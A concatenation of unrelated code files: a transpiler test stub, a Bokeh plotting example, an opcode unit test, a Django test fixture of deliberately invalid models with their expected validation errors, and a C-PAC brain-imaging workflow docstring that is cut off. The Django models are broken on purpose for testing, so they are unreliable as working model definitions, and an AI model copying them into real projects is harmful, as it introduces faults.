from ..utils import TranspileTestCase, BuiltinFunctionTestCase
class InputTests(TranspileTestCase):
pass
|
from bokeh.plotting import figure, show
x = [1, 2, 3, 4, 5]
y = [6, 7, 2, 4, 5]
p = figure(title="Simple line example", x_axis_label="x", y_axis_label="y")
p.line(x, y, legend_label="Temp.", line_width=2)
show(p)
|
from Chip import OpCodeDefinitions
from Tests.OpCodeTests.OpCodeTestBase import OpCodeTestBase
class TestRtiOpCode(OpCodeTestBase):
def test_execute_rti_implied_command_calls_and_method(self):
self.assert_opcode_execution(OpCodeDefinitions.rti_implied_command, self.target.get_rti_command_executed)
|
"""
26. Invalid models
This example exists purely to point out errors in models.
"""
from __future__ import unicode_literals
from django.db import connection, models
class FieldErrors(models.Model):
charfield = models.CharField()
charfield2 = models.CharField(max_length=-1)
charfield3 = models.CharField(max_length="bad")
decimalfield = models.DecimalField()
decimalfield2 = models.DecimalField(max_digits=-1, decimal_places=-1)
decimalfield3 = models.DecimalField(max_digits="bad", decimal_places="bad")
decimalfield4 = models.DecimalField(max_digits=9, decimal_places=10)
decimalfield5 = models.DecimalField(max_digits=10, decimal_places=10)
filefield = models.FileField()
choices = models.CharField(max_length=10, choices='bad')
choices2 = models.CharField(max_length=10, choices=[(1, 2, 3), (1, 2, 3)])
index = models.CharField(max_length=10, db_index='bad')
field_ = models.CharField(max_length=10)
nullbool = models.BooleanField(null=True)
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash1 = models.CharField(max_length=10)
clash2 = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Clash1(models.Model):
src_safe = models.CharField(max_length=10)
foreign = models.ForeignKey(Target)
m2m = models.ManyToManyField(Target)
class Clash2(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, related_name='id')
foreign_2 = models.ForeignKey(Target, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
class Target2(models.Model):
clash3 = models.CharField(max_length=10)
foreign_tgt = models.ForeignKey(Target)
clashforeign_set = models.ForeignKey(Target)
m2m_tgt = models.ManyToManyField(Target)
clashm2m_set = models.ManyToManyField(Target)
class Clash3(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target2, related_name='foreign_tgt')
foreign_2 = models.ForeignKey(Target2, related_name='m2m_tgt')
m2m_1 = models.ManyToManyField(Target2, related_name='foreign_tgt')
m2m_2 = models.ManyToManyField(Target2, related_name='m2m_tgt')
class ClashForeign(models.Model):
foreign = models.ForeignKey(Target2)
class ClashM2M(models.Model):
m2m = models.ManyToManyField(Target2)
class SelfClashForeign(models.Model):
src_safe = models.CharField(max_length=10)
selfclashforeign = models.CharField(max_length=10)
selfclashforeign_set = models.ForeignKey("SelfClashForeign")
foreign_1 = models.ForeignKey("SelfClashForeign", related_name='id')
foreign_2 = models.ForeignKey("SelfClashForeign", related_name='src_safe')
class ValidM2M(models.Model):
src_safe = models.CharField(max_length=10)
validm2m = models.CharField(max_length=10)
# M2M fields are symmetrical by default. Symmetrical M2M fields
# on self don't require a related accessor, so many potential
# clashes are avoided.
validm2m_set = models.ManyToManyField("self")
m2m_1 = models.ManyToManyField("self", related_name='id')
m2m_2 = models.ManyToManyField("self", related_name='src_safe')
m2m_3 = models.ManyToManyField('self')
m2m_4 = models.ManyToManyField('self')
class SelfClashM2M(models.Model):
src_safe = models.CharField(max_length=10)
selfclashm2m = models.CharField(max_length=10)
# Non-symmetrical M2M fields _do_ have related accessors, so
# there is potential for clashes.
selfclashm2m_set = models.ManyToManyField("self", symmetrical=False)
m2m_1 = models.ManyToManyField("self", related_name='id', symmetrical=False)
m2m_2 = models.ManyToManyField("self", related_name='src_safe', symmetrical=False)
m2m_3 = models.ManyToManyField('self', symmetrical=False)
m2m_4 = models.ManyToManyField('self', symmetrical=False)
class Model(models.Model):
"But it's valid to call a model Model."
year = models.PositiveIntegerField() # 1960
make = models.CharField(max_length=10) # Aston Martin
name = models.CharField(max_length=10) # DB 4 GT
class Car(models.Model):
colour = models.CharField(max_length=5)
model = models.ForeignKey(Model)
class MissingRelations(models.Model):
rel1 = models.ForeignKey("Rel1")
rel2 = models.ManyToManyField("Rel2")
class MissingManualM2MModel(models.Model):
name = models.CharField(max_length=5)
missing_m2m = models.ManyToManyField(Model, through="MissingM2MModel")
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
name = models.CharField(max_length=5)
primary = models.ManyToManyField(Person, through="Membership", related_name="primary")
secondary = models.ManyToManyField(Person, through="Membership", related_name="secondary")
tertiary = models.ManyToManyField(Person, through="RelationshipDoubleFK", related_name="tertiary")
class GroupTwo(models.Model):
name = models.CharField(max_length=5)
primary = models.ManyToManyField(Person, through="Membership")
secondary = models.ManyToManyField(Group, through="MembershipMissingFK")
class Membership(models.Model):
person = models.ForeignKey(Person)
group = models.ForeignKey(Group)
not_default_or_null = models.CharField(max_length=5)
class MembershipMissingFK(models.Model):
person = models.ForeignKey(Person)
class PersonSelfRefM2M(models.Model):
name = models.CharField(max_length=5)
friends = models.ManyToManyField('self', through="Relationship")
too_many_friends = models.ManyToManyField('self', through="RelationshipTripleFK")
class PersonSelfRefM2MExplicit(models.Model):
name = models.CharField(max_length=5)
friends = models.ManyToManyField('self', through="ExplicitRelationship", symmetrical=True)
class Relationship(models.Model):
first = models.ForeignKey(PersonSelfRefM2M, related_name="rel_from_set")
second = models.ForeignKey(PersonSelfRefM2M, related_name="rel_to_set")
date_added = models.DateTimeField()
class ExplicitRelationship(models.Model):
first = models.ForeignKey(PersonSelfRefM2MExplicit, related_name="rel_from_set")
second = models.ForeignKey(PersonSelfRefM2MExplicit, related_name="rel_to_set")
date_added = models.DateTimeField()
class RelationshipTripleFK(models.Model):
first = models.ForeignKey(PersonSelfRefM2M, related_name="rel_from_set_2")
second = models.ForeignKey(PersonSelfRefM2M, related_name="rel_to_set_2")
third = models.ForeignKey(PersonSelfRefM2M, related_name="too_many_by_far")
date_added = models.DateTimeField()
class RelationshipDoubleFK(models.Model):
first = models.ForeignKey(Person, related_name="first_related_name")
second = models.ForeignKey(Person, related_name="second_related_name")
third = models.ForeignKey(Group, related_name="rel_to_set")
date_added = models.DateTimeField()
class AbstractModel(models.Model):
name = models.CharField(max_length=10)
class Meta:
abstract = True
class AbstractRelationModel(models.Model):
fk1 = models.ForeignKey('AbstractModel')
fk2 = models.ManyToManyField('AbstractModel')
class UniqueM2M(models.Model):
""" Model to test for unique ManyToManyFields, which are invalid. """
unique_people = models.ManyToManyField(Person, unique=True)
class NonUniqueFKTarget1(models.Model):
""" Model to test for non-unique FK target in yet-to-be-defined model: expect an error """
tgt = models.ForeignKey('FKTarget', to_field='bad')
class UniqueFKTarget1(models.Model):
""" Model to test for unique FK target in yet-to-be-defined model: expect no error """
tgt = models.ForeignKey('FKTarget', to_field='good')
class FKTarget(models.Model):
bad = models.IntegerField()
good = models.IntegerField(unique=True)
class NonUniqueFKTarget2(models.Model):
""" Model to test for non-unique FK target in previously seen model: expect an error """
tgt = models.ForeignKey(FKTarget, to_field='bad')
class UniqueFKTarget2(models.Model):
""" Model to test for unique FK target in previously seen model: expect no error """
tgt = models.ForeignKey(FKTarget, to_field='good')
class NonExistingOrderingWithSingleUnderscore(models.Model):
class Meta:
ordering = ("does_not_exist",)
class InvalidSetNull(models.Model):
fk = models.ForeignKey('self', on_delete=models.SET_NULL)
class InvalidSetDefault(models.Model):
fk = models.ForeignKey('self', on_delete=models.SET_DEFAULT)
class UnicodeForeignKeys(models.Model):
"""Foreign keys which can translate to ascii should be OK, but fail if
they're not."""
good = models.ForeignKey('FKTarget')
also_good = models.ManyToManyField('FKTarget', related_name='unicode2')
# In Python 3 this should become legal, but currently causes unicode errors
# when adding the errors in core/management/validation.py
#bad = models.ForeignKey('★')
class PrimaryKeyNull(models.Model):
my_pk_field = models.IntegerField(primary_key=True, null=True)
class OrderByPKModel(models.Model):
"""
Model to test that ordering by pk passes validation.
Refs #8291
"""
name = models.CharField(max_length=100, blank=True)
class Meta:
ordering = ('pk',)
class SwappableModel(models.Model):
"""A model that can be, but isn't swapped out.
References to this model *shouldn't* raise any validation error.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class SwappedModel(models.Model):
"""A model that is swapped out.
References to this model *should* raise a validation error.
Requires TEST_SWAPPED_MODEL to be defined in the test environment;
this is guaranteed by the test runner using @override_settings.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class BadSwappableValue(models.Model):
"""A model that can be swapped out; during testing, the swappable
value is not of the format app.model
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL_BAD_VALUE'
class BadSwappableModel(models.Model):
"""A model that can be swapped out; during testing, the swappable
value references an unknown model.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL_BAD_MODEL'
class HardReferenceModel(models.Model):
fk_1 = models.ForeignKey(SwappableModel, related_name='fk_hardref1')
fk_2 = models.ForeignKey('invalid_models.SwappableModel', related_name='fk_hardref2')
fk_3 = models.ForeignKey(SwappedModel, related_name='fk_hardref3')
fk_4 = models.ForeignKey('invalid_models.SwappedModel', related_name='fk_hardref4')
m2m_1 = models.ManyToManyField(SwappableModel, related_name='m2m_hardref1')
m2m_2 = models.ManyToManyField('invalid_models.SwappableModel', related_name='m2m_hardref2')
m2m_3 = models.ManyToManyField(SwappedModel, related_name='m2m_hardref3')
m2m_4 = models.ManyToManyField('invalid_models.SwappedModel', related_name='m2m_hardref4')
model_errors = """invalid_models.fielderrors: "charfield": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "charfield2": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "charfield3": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield2": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield2": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield3": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield3": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield4": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.
invalid_models.fielderrors: "filefield": FileFields require an "upload_to" attribute.
invalid_models.fielderrors: "choices": "choices" should be iterable (e.g., a tuple or list).
invalid_models.fielderrors: "choices2": "choices" should be a sequence of two-tuples.
invalid_models.fielderrors: "choices2": "choices" should be a sequence of two-tuples.
invalid_models.fielderrors: "index": "db_index" should be either None, True or False.
invalid_models.fielderrors: "field_": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.
invalid_models.fielderrors: "nullbool": BooleanFields do not accept null values. Use a NullBooleanField instead.
invalid_models.clash1: Accessor for field 'foreign' clashes with field 'Target.clash1_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Accessor for field 'foreign' clashes with related m2m field 'Target.clash1_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Reverse query name for field 'foreign' clashes with field 'Target.clash1'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Accessor for m2m field 'm2m' clashes with field 'Target.clash1_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash1: Accessor for m2m field 'm2m' clashes with related field 'Target.clash1_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash1: Reverse query name for m2m field 'm2m' clashes with field 'Target.clash1'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash2: Accessor for field 'foreign_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Accessor for field 'foreign_1' clashes with related m2m field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Reverse query name for field 'foreign_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Reverse query name for field 'foreign_1' clashes with related m2m field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Accessor for field 'foreign_2' clashes with related m2m field 'Target.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash2: Reverse query name for field 'foreign_2' clashes with related m2m field 'Target.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash2: Accessor for m2m field 'm2m_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Accessor for m2m field 'm2m_1' clashes with related field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_1' clashes with related field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Accessor for m2m field 'm2m_2' clashes with related field 'Target.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_2' clashes with related field 'Target.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Accessor for field 'foreign_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Accessor for field 'foreign_1' clashes with related m2m field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Reverse query name for field 'foreign_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Reverse query name for field 'foreign_1' clashes with related m2m field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Accessor for field 'foreign_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Accessor for field 'foreign_2' clashes with related m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Reverse query name for field 'foreign_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Reverse query name for field 'foreign_2' clashes with related m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Accessor for m2m field 'm2m_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Accessor for m2m field 'm2m_1' clashes with related field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_1' clashes with related field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Accessor for m2m field 'm2m_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Accessor for m2m field 'm2m_2' clashes with related field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_2' clashes with related field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clashforeign: Accessor for field 'foreign' clashes with field 'Target2.clashforeign_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clashm2m: Accessor for m2m field 'm2m' clashes with m2m field 'Target2.clashm2m_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.selfclashforeign: Accessor for field 'selfclashforeign_set' clashes with field 'SelfClashForeign.selfclashforeign_set'. Add a related_name argument to the definition for 'selfclashforeign_set'.
invalid_models.selfclashforeign: Reverse query name for field 'selfclashforeign_set' clashes with field 'SelfClashForeign.selfclashforeign'. Add a related_name argument to the definition for 'selfclashforeign_set'.
invalid_models.selfclashforeign: Accessor for field 'foreign_1' clashes with field 'SelfClashForeign.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.selfclashforeign: Reverse query name for field 'foreign_1' clashes with field 'SelfClashForeign.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.selfclashforeign: Accessor for field 'foreign_2' clashes with field 'SelfClashForeign.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.selfclashforeign: Reverse query name for field 'foreign_2' clashes with field 'SelfClashForeign.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.selfclashm2m: Accessor for m2m field 'selfclashm2m_set' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'selfclashm2m_set' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Accessor for m2m field 'selfclashm2m_set' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_1' clashes with field 'SelfClashM2M.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_2' clashes with field 'SelfClashM2M.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_1' clashes with field 'SelfClashM2M.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_2' clashes with field 'SelfClashM2M.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_3' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_4' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.missingrelations: 'rel1' has a relation with model Rel1, which has either not been installed or is abstract.
invalid_models.missingrelations: 'rel2' has an m2m relation with model Rel2, which has either not been installed or is abstract.
invalid_models.grouptwo: 'primary' is a manually-defined m2m relation through model Membership, which does not have foreign keys to Person and GroupTwo
invalid_models.grouptwo: 'secondary' is a manually-defined m2m relation through model MembershipMissingFK, which does not have foreign keys to Group and GroupTwo
invalid_models.missingmanualm2mmodel: 'missing_m2m' specifies an m2m relation through model MissingM2MModel, which has not been installed
invalid_models.group: The model Group has two manually-defined m2m relations through the model Membership, which is not permitted. Please consider using an extra field on your intermediary model instead.
invalid_models.group: Intermediary model RelationshipDoubleFK has more than one foreign key to Person, which is ambiguous and is not permitted.
invalid_models.personselfrefm2m: Many-to-many fields with intermediate tables cannot be symmetrical.
invalid_models.personselfrefm2m: Intermediary model RelationshipTripleFK has more than two foreign keys to PersonSelfRefM2M, which is ambiguous and is not permitted.
invalid_models.personselfrefm2mexplicit: Many-to-many fields with intermediate tables cannot be symmetrical.
invalid_models.abstractrelationmodel: 'fk1' has a relation with model AbstractModel, which has either not been installed or is abstract.
invalid_models.abstractrelationmodel: 'fk2' has an m2m relation with model AbstractModel, which has either not been installed or is abstract.
invalid_models.uniquem2m: ManyToManyFields cannot be unique. Remove the unique argument on 'unique_people'.
invalid_models.nonuniquefktarget1: Field 'bad' under model 'FKTarget' must have a unique=True constraint.
invalid_models.nonuniquefktarget2: Field 'bad' under model 'FKTarget' must have a unique=True constraint.
invalid_models.nonexistingorderingwithsingleunderscore: "ordering" refers to "does_not_exist", a field that doesn't exist.
invalid_models.invalidsetnull: 'fk' specifies on_delete=SET_NULL, but cannot be null.
invalid_models.invalidsetdefault: 'fk' specifies on_delete=SET_DEFAULT, but has no default value.
invalid_models.hardreferencemodel: 'fk_3' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'fk_4' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'm2m_3' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'm2m_4' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.badswappablevalue: TEST_SWAPPED_MODEL_BAD_VALUE is not of the form 'app_label.app_name'.
invalid_models.badswappablemodel: Model has been swapped out for 'not_an_app.Target' which has not been installed or is abstract.
"""
if not connection.features.interprets_empty_strings_as_nulls:
model_errors += """invalid_models.primarykeynull: "my_pk_field": Primary key fields cannot have null=True.
"""
|
import sys
import os
import commands
import nipype.pipeline.engine as pe
import nipype.algorithms.rapidart as ra
import nipype.interfaces.fsl as fsl
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from utils import *
from CPAC.vmhc import *
from nipype.interfaces.afni import preprocess
from CPAC.registration import create_wf_calculate_ants_warp, \
create_wf_c3d_fsl_to_itk, \
create_wf_collect_transforms, \
create_wf_apply_ants_warp
def create_vmhc(use_ants):
"""
Compute the map of brain functional homotopy, i.e. the degree of synchrony in spontaneous activity between geometrically corresponding interhemispheric (homotopic) regions.
Parameters
----------
None
Returns
-------
vmhc_workflow : workflow
Voxel Mirrored Homotopic Connectivity Analysis Workflow
Notes
-----
`Source <https://github.com/FCP-INDI/C-PAC/blob/master/CPAC/vmhc/vmhc.py>`_
Workflow Inputs::
inputspec.brain : string (existing nifti file)
Anatomical image (without skull)
inputspec.brain_symmetric : string (existing nifti file)
MNI152_T1_2mm_brain_symmetric.nii.gz
inputspec.rest_res_filt : string (existing nifti file)
Band-passed image with nuisance signals regressed out (and optionally scrubbed). Recommended bandpass filter: (0.001, 0.1)
inputspec.reorient : string (existing nifti file)
RPI oriented anatomical data
inputspec.example_func2highres_mat : string (existing affine transformation .mat file)
Specifies an affine transform that should be applied to the example_func before nonlinear warping
inputspec.standard : string (existing nifti file)
MNI152_T1_standard_resolution_brain.nii.gz
inputspec.symm_standard : string (existing nifti file)
MNI152_T1_2mm_symmetric.nii.gz
inputspec.twomm_brain_mask_dil : string (existing nifti file)
MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz
inputspec.config_file_twomm_symmetric : string (existing .cnf file)
T1_2_MNI152_2mm_symmetric.cnf
inputspec.rest_mask : string (existing nifti file)
A functional volume mask (derived by dilating the motion-corrected functional volume)
fwhm_input.fwhm : list (float)
FWHM used for spatially smoothing the Z-transformed correlations in MNI space.
Generally set to 1.5 or 2 times the voxel size of the input image.
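For example, for a 3 mm isotropic input this rule gives fwhm values of 4.5 or 6, the values used in the Examples section below.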
inputspec.mean_functional : string (existing nifti file)
The mean functional image for use in the func-to-anat registration matrix conversion
to ITK (ANTS) format, if the user selects to use ANTS.
Workflow Outputs::
outputspec.highres2symmstandard : string (nifti file)
Linear registration of T1 image to symmetric standard image
outputspec.highres2symmstandard_mat : string (affine transformation .mat file)
An affine transformation .mat file produced by the linear registration and used in the nonlinear registration
outputspec.highres2symmstandard_warp : string (nifti file)
Warp file from the nonlinear registration of T1 to the symmetric standard brain
outputspec.fnirt_highres2symmstandard : string (nifti file)
Nonlinear registration of T1 to the symmetric standard brain
outputspec.highres2symmstandard_jac : string (nifti file)
Jacobian determinant image from the nonlinear registration of T1 to the symmetric standard brain
outputspec.rest_res_2symmstandard : string (nifti file)
Functional image after nonlinear registration (func to standard) to the symmetric standard space
outputspec.VMHC_FWHM_img : string (nifti file)
Pearson correlation between rest_res_2symmstandard and its L/R-flipped copy
outputspec.VMHC_Z_FWHM_img : string (nifti file)
Fisher Z transform map
outputspec.VMHC_Z_stat_FWHM_img : string (nifti file)
Z statistic map
Order of commands:
- Perform linear registration of Anatomical brain in T1 space to symmetric standard space. For details see `flirt <http://www.fmrib.ox.ac.uk/fsl/flirt/index.html>`_::
flirt
-ref MNI152_T1_2mm_brain_symmetric.nii.gz
-in mprage_brain.nii.gz
-out highres2symmstandard.nii.gz
-omat highres2symmstandard.mat
-cost corratio
-searchcost corratio
-dof 12
-interp trilinear
- Perform nonlinear registration (highres to standard) to symmetric standard brain. For details see `fnirt <http://fsl.fmrib.ox.ac.uk/fsl/fnirt/>`_::
fnirt
--in=head.nii.gz
--aff=highres2symmstandard.mat
--cout=highres2symmstandard_warp.nii.gz
--iout=fnirt_highres2symmstandard.nii.gz
--jout=highres2symmstandard_jac.nii.gz
--config=T1_2_MNI152_2mm_symmetric.cnf
--ref=MNI152_T1_2mm_symmetric.nii.gz
--refmask=MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz
--warpres=10,10,10
- Perform spatial smoothing on the input functional image (inputspec.rest_res_filt). For details see `PrinciplesSmoothing <http://imaging.mrc-cbu.cam.ac.uk/imaging/PrinciplesSmoothing>`_ `fslmaths <http://www.fmrib.ox.ac.uk/fslcourse/lectures/practicals/intro/index.htm>`_::
fslmaths rest_res_filt.nii.gz
-kernel gauss FWHM / sqrt(8 * ln(2))
-fmean -mas rest_mask.nii.gz
rest_res_filt_FWHM.nii.gz
- Apply nonlinear registration (func to standard). For details see `applywarp <http://www.fmrib.ox.ac.uk/fsl/fnirt/warp_utils.html#applywarp>`_::
applywarp
--ref=MNI152_T1_2mm_symmetric.nii.gz
--in=rest_res_filt_FWHM.nii.gz
--out=rest_res_2symmstandard.nii.gz
--warp=highres2symmstandard_warp.nii.gz
--premat=example_func2highres.mat
- Copy and L/R swap the output of applywarp command (rest_res_2symmstandard.nii.gz). For details see `fslswapdim <http://fsl.fmrib.ox.ac.uk/fsl/fsl4.0/avwutils/index.html>`_::
fslswapdim
rest_res_2symmstandard.nii.gz
-x y z
tmp_LRflipped.nii.gz
- Calculate the Pearson correlation between rest_res_2symmstandard.nii.gz and the flipped rest_res_2symmstandard.nii.gz (tmp_LRflipped.nii.gz). For details see `3dTcorrelate <http://afni.nimh.nih.gov/pub/dist/doc/program_help/3dTcorrelate.html>`_::
3dTcorrelate
-pearson
-polort -1
-prefix VMHC_FWHM.nii.gz
